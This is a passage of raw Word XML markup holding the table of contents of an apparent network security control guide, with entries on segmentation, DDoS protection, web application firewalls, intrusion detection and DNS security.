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175BE4EF" w14:textId="426B707E" w:rsidR="00831807"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42449463" w:history="1">
            <w:r w:rsidR="00831807" w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.</w:t>
            </w:r>
            <w:r w:rsidR="00831807">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00831807" w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Network Security</w:t>
            </w:r>
            <w:r w:rsidR="00831807">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00831807">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00831807">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449463 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00831807">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00831807">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00831807">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="00831807">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3B6A5EE5" w14:textId="34F3A6A3" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="960"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449464" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.1.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Apply network isolation</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449464 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7AC74843" w14:textId="4DE5586E" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449465" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.1.1.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>NS-1: Establish network segmentation boundaries</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449465 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4A2C20B5" w14:textId="75727801" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="960"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449466" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
              </w:rPr>
              <w:t>c.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:noProof/>
              </w:rPr>
              <w:t>MITRE ATT&amp;CK</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449466 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="19EFAF06" w14:textId="208A7A84" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="960"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449467" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.2.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Secure network boundaries</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449467 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1B1A48E8" w14:textId="19AC8778" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449468" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.2.1.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">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_Toc242449468 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5A6BA9F2" w14:textId="44E58F7C" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449469" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.2.2.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">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_Toc242449469 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6F63958F" w14:textId="660E387E" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449470" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.2.3.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>NS-5: Deploy DDOS protection</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449470 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5A6D7753" w14:textId="18E006CE" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449471" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.2.4.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>NS-6: Deploy web application firewall</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449471 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3487860B" w14:textId="5C131EE2" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449472" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.2.5.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>NS-9: Connect on-premises or cloud network privately</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449472 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4E2E1422" w14:textId="35E06830" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="960"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449473" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.3.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Monitor and respond</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449473 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="58C748C6" w14:textId="7B127272" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449474" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cs="Arial"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.3.1.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>NS-4: Deploy intrusion detection/intrusion prevention</w:t>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cs="Arial"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>systems (IDS/IPS)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449474 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="703FA766" w14:textId="3B459198" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449475" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.3.2.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">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_Toc242449475 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5505DB3B" w14:textId="523CAD88" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449476" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.3.3.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">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_Toc242449476 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5CB844EB" w14:textId="54AC4D8B" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449477" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.3.4.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>NS-10: Ensure Domain Name System (DNS) security</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449477 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>22</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2438C716" w14:textId="1814EDE2" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="480"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
